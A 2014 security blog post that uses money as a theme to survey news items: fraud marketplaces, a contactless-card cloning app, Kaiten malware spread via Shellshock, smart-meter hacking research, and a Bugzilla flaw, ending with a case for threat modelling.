Wednesday, October 8, 2014

A good (economic) cape covers everything (even digital ethics)

It is hard to find another thing which has provoked such a deluge of letters as money. Benjamin Franklin said that "money never made a man happy yet, nor will it. The more a man has, the more he wants. Instead of filling a vacuum, it makes one." Voltaire also cared for our souls when he alerts "don't think money does everything or you are going to end up doing everything for money." And even the Castilian proverb "a good cape covers everything" warns us about it. The power of money lies on how it can change people, for better or worse.

In the digital world, we find arguments for both situations. For instance, bank fraud has evolved from operating in a very disorganized manner some years ago to being managed as a crime company nowadays. Outlets of stolen bank details apply techniques and certifications to boost buyer confidence, like any legal e-commerce operator. When you visit any of these websites, some of them accessible from anywhere on the  Internet, you realize you are not in front of a dark portal managed by crackers, but a company that takes cares of its customers.

On the other hand, researchers sometimes putting general interest before their own benefits and warn of alarming projects like Peter Fillmore’s one. It is an application specifically designed for the Nexus 4, which allows to clone a particular type of payment contactless cards for Australian TPVs. The Cyanogen Mod, a popular Android ROM was an essential part of this development, which uses an open source virtual card management gateway as well.

The disclose of Bash vulnerability, know as Shellshock, is still being exploited by the bad boys. Kaiten, a popular DoS tool controlled via IRC, developed a new attack vector taking advantage of this bug in OS X. Victims suffer attacks from a compromised legitimate web that download the file containing the malware by bash. To avoid security systems, the file is compiled in gcc, which allow it to download the source code and compile it once it is on the device ( not vice versa, as it usually happens with binary installation).

In the security sector, there are still real hackers interested in making public the numerous security flaws on computer systems. Alberto Garcia and Javier Vazquez are two Spaniards who will present a guide to take control of smart meters at the Black Hat Europe next week. In theory, they could perform a power outage to an entire neighborhood or increase the bill for its citizens.

Probably Bugzilla sounds familiar for those of you who are developers. In fact, it is one of the most popular bug management systems in the market, which moreover is free. Currently this project, framed on Mozilla’s open source philosophy, is not doing very well. A few months ago we learn that a significant percentage of its users’ data were compromised. Now it seems that a vulnerability in its code could allow an attacker to escalate privileges and manage permissions to get information he looks for, what could provoke havoc on both open and proprietary third party’s projects where it is daily used.

For all people involved in the development of a business technology project should remind that applying threat modeling in testing phase is a healthy habit that normally allows you to have a bit of “fun”, and above all, affects on a positive way on its economic margins. If every service had a threat testing system, information leaks would decrease exponentially, users’ data would be more secure, confidence in these companies would raise significantly and would be even more profitable.

Here you have six topics on which computer security interferes with business; six themes that bring out both the good and bad part of human being; and a new excuse to discuss this exciting industry with you. Thank you!


Post a Comment